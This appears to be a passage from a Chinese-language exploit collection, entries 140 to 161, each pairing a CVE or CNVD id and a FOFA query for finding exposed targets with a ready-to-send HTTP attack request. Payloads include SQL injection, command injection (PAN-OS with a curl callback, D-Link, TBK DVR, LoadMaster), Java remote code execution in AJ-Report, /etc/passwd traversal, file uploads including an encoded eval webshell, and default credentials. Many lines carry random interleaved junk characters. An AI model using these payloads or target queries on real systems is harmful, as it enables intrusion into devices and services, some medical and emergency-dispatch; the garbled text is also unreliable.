3 _+ l* _- g8 ~2 z: FHost: x.x.x.x- _ H/ p# L$ _6 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ i" j6 u" _% o0 g& P6 A6 s* h6 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 J1 G' S' L' X5 Q, ?, p9 @4 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- Q" D" m; A6 h3 W
Accept-Encoding: gzip, deflate, br
* Y0 b( ^6 |: j" y4 I% ?. CConnection: close& R( W7 t6 |' Z% Q" ]8 v% V+ I
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
+ i L6 \1 d8 o) a# l$ tUpgrade-Insecure-Requests: 14 T# s' f5 j' R
& d: V/ x8 j" I8 z; B# p7 _% Y7 d) U5 L1 ~. R$ ~/ N0 s- W
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入 i( f! ?: ^, Y) ]
CVE-2024-2566; G3 o( J) \# L) V4 u# t6 \
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 P u% O8 W& L9 N& uGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
% H+ Y- x. S9 `+ LHost: x.x.x.x
2 M7 G' o5 x$ @0 a$ C( G( |/ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 `6 t* Q1 p) K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 R+ z( |9 @6 c# [0 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; K) ]1 [8 [( I5 H+ G2 L. ^) nAccept-Encoding: gzip, deflate, br
4 i1 { J5 f) w+ UConnection: close
w l* Z% W: D- ^9 B7 _Cookie: authcode=h8g9# j6 P: o0 y L* I x' t
Upgrade-Insecure-Requests: 1
2 N$ L3 u: Z" k4 Z, g$ i( ?5 r; x2 }' {. n* X
0 R9 A9 R$ z" a7 k% t
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
* |9 p ]$ g/ I, S. c2 GFOFA:body="指挥调度管理平台"' p- [9 r4 A) ~4 R7 u! Q" c
POST /app/ext/ajax_users.php HTTP/1.1
* _6 r( l7 ?* O: n( ?; y2 H( RHost: your-ip
9 D T7 |8 n( }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info% V- ]3 G; B' z& o% w6 i9 `: G$ N0 r& t o
Content-Type: application/x-www-form-urlencoded+ A9 M: B9 t+ p5 A" p
0 K8 s/ P+ P$ U) B( p, X: p: X1 w% q' I
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -! G, ?. T1 H; p: U: t0 H
0 R1 W$ `! `% _- m7 d4 n
! v1 u# T( G% v7 x# `
142. CMSV6车辆监控平台系统中存在弱密码( V" ?2 T Y2 ^5 q
CVE-2024-296668 h2 Z E5 d( W9 P) K+ f2 }
FOFA:body="/808gps/". O7 [* x7 B4 O# b& r3 t* a
admin/admin
/ d& k( _! [" z* ^2 R0 A143. Netis WF2780 v2.1.40144 远程命令执行 A o Y4 i2 D2 ~" k O7 e4 w
CVE-2024-258503 y" W( K9 N9 u: U
FOFA:title='AP setup' && header='netis'$ f( F$ Y# W) h& B
PAYLOAD
) O& Q# ^! ?+ r& X
, n& E3 F0 a( y3 | s' z& F' [144. D-Link nas_sharing.cgi 命令注入5 V, B7 O, ]2 F! i) n9 p/ U5 a
FOFA:app="D_Link-DNS-ShareCenter"& r. Y) }& I5 u' B" x
system参数用于传要执行的命令
- n; E$ x0 P% L6 yGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
: N5 e0 `% l; ]0 B# e0 E* A; hHost: x.x.x.x4 b. S( b: d' q* b9 A
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0- W% u2 I3 [8 F" H& U
Connection: close6 ^. t' v0 x3 t/ Q5 J ?* ]& d
Accept: */*3 j5 A6 [- E& A j9 E% R- |6 |
Accept-Language: en& w/ i, b( W2 M- M2 _$ t
Accept-Encoding: gzip. H' O( x6 z p+ `: e% ?4 {& t
& K' W5 n \0 k5 k0 v/ {9 v: @
5 R" N' ^- o8 _3 n5 d, H$ U2 G; x145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# {7 u9 T% z' c* K
CVE-2024-3400
1 W* z# R7 K# F- tFOFA:icon_hash="-631559155"
5 k5 @. L6 w9 v( g, ]GET /global-protect/login.esp HTTP/1.1
* q: a& ?5 l( Y) jHost: 192.168.30.112:1005. @0 r: C4 G% \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' b L8 b+ m5 @% ~+ K
Connection: close
9 ?1 j$ C! \5 O3 H" eCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;: C9 u, W# _( V& h: U$ l& H
Accept-Encoding: gzip
8 e" U i8 r/ }8 K
# K' c( {, m3 M; L! C) f* n% _
% I1 D. u* I/ F* G146. MajorDoMo thumb.php 未授权远程代码执行5 x* ^4 R2 a/ D9 Y( f
CNVD-2024-02175
* p$ ~ G6 G: H3 x3 F+ I5 vFOFA:app="MajordomoSL"
3 R( Z: K3 ^% D8 _! C, J2 xGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
# a; Z5 M4 Y/ x2 j) l: g6 A" SHost: x.x.x.x7 o0 G- z" |8 x6 h/ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84$ Z0 M8 y" `+ v0 R
Accept-Charset: utf-8
9 z+ `8 ]* H/ eAccept-Encoding: gzip, deflate+ e0 U8 g3 H2 ~# u- Y
Connection: close1 f% k6 t. z( ]( @3 V1 Y
i7 L0 C4 a, M# L; P
; Y: X6 E+ p5 s147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% v: k- i2 u4 @2 Q
CVE-2024-32399
/ {5 G) p& u" V6 BFOFA:body="RaidenMAILD"# D8 N1 { y8 q* p+ L8 P R
GET /webeditor/../../../windows/win.ini HTTP/1.1
) }' f3 `$ h9 M. s1 M4 H7 ~Host: 127.0.0.1:81
/ |. |7 @$ `4 ^2 LCache-Control: max-age=0/ [4 Z) N6 e* s3 o, i! M" _0 u
Connection: close
( n, {" D2 Q0 W' t! d: U8 B5 p; ]/ Q+ y/ S8 ~- z
* _: y4 i0 z- j4 L( e" r148. CrushFTP 认证绕过模板注入6 h3 q9 W. E4 a u: ?) p
CVE-2024-4040
5 c0 X. C) O9 h. l7 I5 w u/ Q# bFOFA:body="CrushFTP"
! _# o, k) m8 v3 c9 Y1 [ ~PAYLOAD
s$ d; |+ k9 G' A }' O8 w8 _3 G2 L2 c# J5 O. P
149. AJ-Report开源数据大屏存在远程命令执行5 [+ M5 E8 w* m1 f7 `+ r
FOFA:title="AJ-Report"7 J9 P+ a$ ^2 O" Y* g* p; ?
$ n$ T6 c8 u" ]. [( ?+ nPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
) j' W8 N$ p P; |! lHost: x.x.x.x1 P c3 _( p: F2 s a( T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* f" ~7 A+ c% E2 \- D8 y+ J/ _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) a7 ?# \9 m, k8 M# J6 f) z# HAccept-Encoding: gzip, deflate, br; v7 h& W! K4 r3 q$ N' \
Accept-Language: zh-CN,zh;q=0.9
5 O1 X3 P1 i* g- f- u3 YContent-Type: application/json;charset=UTF-8
# Z4 E' z( z9 _7 iConnection: close+ T7 }1 [0 [* ?% ^
( I6 w8 v q1 B' J( \{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}' A6 u7 E3 q2 j4 l$ F5 i$ P
0 k, D& H) G" b7 y8 Z
150. AJ-Report 1.4.0 认证绕过与远程代码执行# U2 }! W/ K% M1 a2 W k
FOFA:title="AJ-Report"
7 `7 n# u% M2 }' r- l6 S3 W% }7 `POST /dataSetParam/verification;swagger-ui/ HTTP/1.1- c& q& m* i$ G; F
Host: x.x.x.x! s' @+ P( j3 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* O" O. Q/ q$ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 ~6 _- v6 l7 ?+ {' T/ r% K' L
Accept-Encoding: gzip, deflate, br |' u, ^( k. ~! y9 ^) d
Accept-Language: zh-CN,zh;q=0.9- \4 P. u* u* g' s2 ^
Content-Type: application/json;charset=UTF-8 W/ s0 S+ Q9 l" v( w- E
Connection: close9 ?8 h, s3 c' i" \. \
Content-Length: 339
! S/ O& L6 K2 s0 j4 t. x: h& F7 e3 m }! e4 p% [
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}3 O0 [- E' W R7 A" \4 J, ]
' O$ r9 m# \0 Z* A8 d8 K
" j9 f3 K/ \. n0 j" G$ n; a$ \
151. AJ-Report 1.4.1 pageList sql注入" q/ x# B: w$ G& j8 C( U: k
FOFA:title="AJ-Report"# j, \% T v/ s% w1 |% \
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
1 H" @! M! { e3 |; S) WHost: x.x.x.x
, C$ r+ @& x4 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 O3 i, v, q! L! b4 [' p# `/ HConnection: close
/ }$ a) d/ e3 ~7 K3 U! bAccept-Encoding: gzip! ^' b3 ~1 t6 \8 J
/ k6 Z; s5 ]9 N& n% x
8 H8 u9 {% h; a* ~( H9 T$ j( y
152. Progress Kemp LoadMaster 远程命令执行
0 ]( ?" _4 \, l4 J2 d+ [CVE-2024-12125 n1 k3 X- I4 ?/ f/ z, x
LoadMaster <= 7.2.59.2 (GA)0 ?) J" ^: |, q. w
LoadMaster<=7.2.54.8 (LTSF)
# W: R5 z% a( H4 y; j: a9 X: CLoadMaster <= 7.2.48.10 (LTS)- V) \$ B) p9 m, l& v$ n, h( X
FOFA:body="LoadMaster"1 R; U& t1 i6 I M$ }! E) d
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
m6 L @2 I5 N1 _1 l0 cGET /access/set?param=enableapi&value=1 HTTP/1.1" E% o# M( V1 y
Host: x.x.x.x; O5 s& n4 q3 G6 ]' p' h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1 [1 P+ e/ d/ b6 \- }8 d7 E
Connection: close2 O v5 r4 d I7 P
Accept: */*
. J1 @ p Q2 L# g- V! ]Accept-Language: en
; U7 \+ n! }" ^3 }Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=" F5 x) @( }) I; s- M8 [
Accept-Encoding: gzip* c g/ c, m) m% p1 ^+ y# ~, ]+ }
( q7 ] `% Q# _$ l1 @9 @! r" z0 T$ t& @
153. gradio任意文件读取1 c) c3 Z c# G$ M
CVE-2024-1561FOFA:body="__gradio_mode__" @% A& p& ?7 {% C
第一步,请求/config文件获取componets的id3 S: b6 ~8 V( A) t7 Z# F( \
http://x.x.x.x/config
0 {$ f2 f& s1 C, L5 s$ O# \, w1 b# N: u: Q! k- j# v) X
) x& p- p( q; {( v& D# J( R第二步,将/etc/passwd的内容写入到一个临时文件
* k4 b( p& L( W, O5 R/ K, b9 b; _POST /component_server HTTP/1.1* n7 Z( ?6 }8 z6 \) K2 A T
Host: x.x.x.x
" u& D" m1 q' o& H! O7 v3 v" MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3; O. Y5 x- g) i* i2 p+ d
Connection: close
% u% `; X, S1 nContent-Length: 115
$ n+ ~" [% }- D* n9 o% B9 x# rContent-Type: application/json
) j. e: b3 J. j3 h1 o f- vAccept-Encoding: gzip8 a1 G& C0 s9 U9 z2 k3 `
_" H4 O5 [' o3 z! Y' z{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
& M; m; g( ~: C4 {' o* u# M) S$ C
: \ K9 O' k& }( N
第三步访问
; h* k5 g. T% X' |' `http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd- E. O6 E7 e- |1 S3 T8 q
* n% g1 s! }' X% [7 `3 g7 l4 I/ j ~( a9 n7 f1 Y' z5 {
154. 天维尔消防救援作战调度平台 SQL注入
1 P8 Y6 B8 T' Q1 {& x k. @CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
) H) `# B: D4 q& ?POST /twms-service-mfs/mfsNotice/page HTTP/1.11 t( f/ }# W! k; E9 d' s
Host: x.x.x.x
; j2 p- `! {2 o9 b' O. V& @Content-Length: 1065 ~( D& w6 R- F" s4 `; C8 l% y
Cache-Control: max-age=0% C( y8 O, H( Y r8 W" ?0 }
Upgrade-Insecure-Requests: 1
* T7 G2 Y! A" @Origin: http://x.x.x.x3 `6 X6 K* b# @! {" p [. H1 n
Content-Type: application/json
}0 t/ B H9 e7 U" q9 m. s. d/ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36( I" u3 h. g$ e* r8 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* i6 n0 h6 P- _
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
' e6 N1 E* |3 _8 s" [' ?5 cAccept-Encoding: gzip, deflate. Z( U6 |# t$ O% `
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.72 D5 Z& w7 f7 | s& k' V( B
Connection: close: U( T* j1 r: d
% ^# {# s8 J5 `
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}; z9 y3 g: f8 G5 N: J: V7 }5 ~
, x* j' B2 q( [+ Z4 E( Z. j* z' _9 I5 Z3 R3 W' _
155. 六零导航页 file.php 任意文件上传
6 S5 y1 j; H( ]& H `CVE-2024-34982
* ~2 \0 S$ C! ^FOFA:title=="上网导航 - LyLme Spage"
! D$ S. ?: e& [POST /include/file.php HTTP/1.1
4 g6 J- o" G( W8 |8 `Host: x.x.x.x
+ q7 y: e1 O% b# b/ a/ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
7 S5 w2 F: l/ v, vConnection: close
3 v% K; S- v% Y' d5 N( p( WContent-Length: 232' R0 Z: Z7 S9 r- u
Accept: application/json, text/javascript, */*; q=0.01 B, K q. O0 T! |
Accept-Encoding: gzip, deflate, br
9 f2 P; Z$ H- X& lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& Z7 R2 I: G" K) R8 n% m1 k) j
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f0 W' |3 W* I7 S5 p% V
X-Requested-With: XMLHttpRequest
5 V) }0 L$ N3 T& R, F; H3 c" |- u7 O1 G, ?7 ~; w6 t. D, i( V
-----------------------------qttl7vemrsold314zg0f7 k, p$ L& q+ Y0 B
Content-Disposition: form-data; name="file"; filename="test.php"
- b9 a! N0 C& {7 nContent-Type: image/png0 }6 ]0 M/ Q8 ^, C, \) T; n1 X- j
; a" `. X, F; G# w$ s$ s<?php phpinfo();unlink(__FILE__);?>3 J% p8 b7 \# _4 ~! @" \; l
-----------------------------qttl7vemrsold314zg0f--" U9 i% G0 N4 b8 D- o: X5 v2 z
6 Q$ r6 s" Y3 ~% ]& W8 X+ G$ p0 R
' c/ s" ]4 | j/ K, W& M访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
' B/ N2 O! S* p# A: X4 y# B. ?* @& h( I
156. TBK DVR-4104/DVR-4216 操作系统命令注入
( c' Z% r, b, A( p' i6 s }6 gCVE-2024-3721
; O* G$ D x$ C( S* p' YFOFA:"Location: /login.rsp"
+ I1 u' _2 c; X e$ n a·TBK DVR-4104, F/ E# ]$ Y+ _3 x7 v" h
·TBK DVR-4216
+ S" o+ G/ c; k( D/ jcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"9 B8 y8 [9 W* j4 |
7 Y0 ]5 S! }. P8 H
, o, }* Z. p' j' i. I
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
: }. {0 a/ H& E! g# {& z/ ^3 s; uHost: x.x.x.x* V! O8 n/ q- ?' z& u
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% y0 D# F8 H( F, o6 m Z7 b L
Connection: close
* R! Y1 O- o' b6 _& `Content-Length: 0, U" }: ^( M3 b$ M6 L% k& W
Cookie: uid=16 n7 }2 X+ T; E6 C3 H
Accept-Encoding: gzip
8 B! v) X. O1 J. K
% m7 y: `, z) U( j5 j7 f, l7 d! R- l
157. 美特CRM upload.jsp 任意文件上传6 C- F' z+ D4 P7 ^, Y! d
CNVD-2023-06971
]7 S9 v9 x/ o, c8 A3 W' DFOFA:body="/common/scripts/basic.js"
( d$ Y! V2 O5 W; q, Z. aPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
, R8 A* y" Y2 {2 E% BHost: x.x.x.x: Z o% f- ^( ^1 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
6 J" X( w+ E& j2 ?. {Content-Length: 709
7 n# k \2 @2 T1 r6 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% Y5 h, H- C4 E
Accept-Encoding: gzip, deflate( l5 o/ G/ s: }; k% }
Accept-Language: zh-CN,zh;q=0.9
/ ^: m' F' L1 |( RCache-Control: max-age=0
y! b- d q! M) U# A" jConnection: close/ r7 f& z' B- l5 o! g4 P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
# C5 Q& V3 y6 Z/ v3 x& \; pUpgrade-Insecure-Requests: 14 x* G- L) a5 K
8 [9 H+ f1 R6 G! t
------WebKitFormBoundary1imovELzPsfzp5dN7 {) F! v3 ?/ r' `4 j
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
! u" V1 _* u R. @4 u$ kContent-Type: application/octet-stream7 a, q, g7 W2 K2 t
. y0 A6 G8 \9 Z% e8 \
nyhelxrutzwhrsvsrafb
+ ?8 b: O, ]7 z# i0 [------WebKitFormBoundary1imovELzPsfzp5dN# `4 f; D3 s- |2 B1 b: y9 a* t
Content-Disposition: form-data; name="key"
. q/ m. ?$ p9 w
2 F' e) y' ^; S3 @9 Nnull
7 D, `( ?9 w. N! V5 {# T; J, P3 D------WebKitFormBoundary1imovELzPsfzp5dN
: G* F2 ?% P; `0 }! p" U% BContent-Disposition: form-data; name="form"9 [* ^; U1 y0 @3 r' P$ e' [- I6 A
8 o" N$ y$ ?+ O+ T9 S8 Lnull
% U* Q, r# Y/ c ^: w- x0 |. N! T0 j------WebKitFormBoundary1imovELzPsfzp5dN* o3 F9 `: T$ `4 D+ V* D
Content-Disposition: form-data; name="field"
) C/ p- V% @) ^' v8 P6 v% b. E; y
# w, t5 ^. {( j8 N# Q8 jnull
! Q# v2 k8 V8 Z# g9 j------WebKitFormBoundary1imovELzPsfzp5dN
3 s) K" ]8 w9 i/ H1 _Content-Disposition: form-data; name="filetitile"$ L0 u; \. x/ S2 |) B L6 t
' J4 Q4 x2 E' E/ [2 b
null$ p$ B6 x; {& A. m" i
------WebKitFormBoundary1imovELzPsfzp5dN- h& g5 S: }2 S; x+ j) X: F$ i$ s
Content-Disposition: form-data; name="filefolder"
8 E6 O$ w; L( G7 v/ F W& P. v% u* U/ R+ h
null
3 k& {) B Y X. X ~2 w' z# a------WebKitFormBoundary1imovELzPsfzp5dN--* \) U0 y; a) q& ?* t
% R5 ]0 A0 j3 c N
9 w: k/ f4 s7 P9 d" f5 zhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
: c) `, z" u0 o. x5 O! ?8 u/ d
; @* T: u5 _& ?% R! f! }- R158. Mura-CMS-processAsyncObject存在SQL注入* E6 Y/ }' z( A' S1 t2 _
CVE-2024-326402 e9 M, z* {* ~5 f3 F
FOFA:"Generator: Masa CMS"/ B) g+ @# s/ v; B) z
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 m5 J l0 @) B& G: R" f6 W, F8 q7 D
Host: {{Hostname}}& [/ W+ F% j! M2 A
Content-Type: application/x-www-form-urlencoded8 [4 X( G( z: x, v) D7 q2 o- j
. b0 h& b% B) f1 H9 \
object=displayregion&contenthistid=x\'&previewid=1
# a$ L* F; ?5 ~8 F% c5 q) _" g
9 p1 p$ J# H) r8 M
% d$ v5 _7 j/ u3 K9 L1 i159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传+ g4 w1 u6 k7 C! h
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")& m1 J- B# s9 i
POST /webservices/WebJobUpload.asmx HTTP/1.1# _/ d9 p5 `0 t0 H
Host: x.x.x.x
7 O% ~4 x% c( lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
3 e7 M$ K4 r$ @- c" r sContent-Length: 1080$ p/ P/ O1 d8 e. Y9 o& g9 x: g2 L
Accept-Encoding: gzip, deflate
* r2 }( d" u/ YConnection: close V8 y' Y/ |8 N/ Q. a" E
Content-Type: text/xml; charset=utf-8
) P% P6 Y$ S: N, |: O5 K' a( OSoapaction: "http://rainier/jobUpload"
) I* L) T; r6 x" e
3 H# d p6 k8 @<?xml version="1.0" encoding="utf-8"?>" S; l( C) T# y$ q8 J# B7 k8 s
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
" @5 ^: g5 g4 U, @<soap:Body>9 A/ T0 N2 Y5 A% @% ]. L
<jobUpload xmlns="http://rainier">0 M. C" @0 ~$ S3 \; N1 o4 R8 X
<vcode>1</vcode>: e" O% ]4 l( R1 L) E! I* E
<subFolder></subFolder>
8 q# A9 q5 G- ~6 R* M. \$ ~ s<fileName>abcrce.asmx</fileName>
2 J0 d. ]5 b6 z: ?8 T: q<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
$ y* h9 B6 ]4 n9 W W</jobUpload>0 U. X5 V2 i" K5 u
</soap:Body>2 J& ? K% X4 o- X
</soap:Envelope>
1 j3 c6 u/ S4 g( Z5 I, F( j& x
/ J; h$ m6 L* G1 a$ r2 k# {& q. N/ F$ |+ Q4 O8 V
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
) f& x& C' R# e6 [2 @: q# k v5 O# q& B# B
0 u# {8 t1 A5 i160. Sonatype Nexus Repository 3目录遍历与文件读取
0 {: Z% v& u( s( ~# [% I# i' TCVE-2024-4956
( v, [% c6 f+ z8 D4 ] JFOFA:title="Nexus Repository Manager"
. f1 D% b( y+ ^GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
4 T& R/ M: J9 z: a6 V [Host: x.x.x.x
* _) c0 }' v2 |8 p1 f8 q7 C2 hUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0- E# J+ l9 H5 ~( L: S: r* |- E* ~1 ]
Connection: close( Z( y& W( k* R
Accept: */*( q% J3 r& {* H+ c
Accept-Language: en
, r1 G, ]) O4 I& x& WAccept-Encoding: gzip' k. t1 N7 _1 B" Q; _# g( U2 u2 p
" Q* u, O. c) k- `+ T4 D" h" O% v: A1 O2 t" ?+ e
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. I2 Z% ^6 l, r; H6 U
FOFA:body="/KT_Css/qd_defaul.css"
: R1 w' [9 O7 D, ]" J9 ^- a第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密+ A6 @: P) I! @
POST /Webservice.asmx HTTP/1.1+ W, P/ ^1 B8 \* Q
Host: x.x.x.x
3 H4 {( B( i' l. I' XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36; F. U- v7 ]8 B+ Q/ a0 R: U
Connection: close
0 t' j4 Q: s# J) |, @2 t& hContent-Length: 445
6 c4 m1 T M! z1 u3 lContent-Type: text/xml* @3 S3 V" `! m8 r0 t0 I& Y9 T
Accept-Encoding: gzip. f2 V2 _/ R1 d
# l9 z7 X$ _" k: f& i
<?xml version="1.0" encoding="utf-8"?>
( v8 N9 U) m4 o2 x6 |6 L<soap:Envelope xmlns:xsi=": L- F* N2 r2 {+ |
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"& l5 z4 u/ |& p' n7 q8 T, n/ T
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">* L, {4 U; ^5 _3 C4 U2 j$ _9 }
<soap:Body>
+ f% P/ S; E" n+ V: V<UploadResume xmlns="http://tempuri.org/">/ i; J4 t" Q( S8 }7 H0 Z W; S
<ip>1</ip>
* ]$ K1 K5 a$ Z. S; _<fileName>../../../../dizxdell.aspx</fileName>
; S% S8 J( {2 [. x. z! m B& q% w<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>& B% I4 _) `# d& D, {5 [
<tag>3</tag>
: y. W* c8 O' V/ l</UploadResume>- T( ~( {2 I8 i! d$ z. b; O
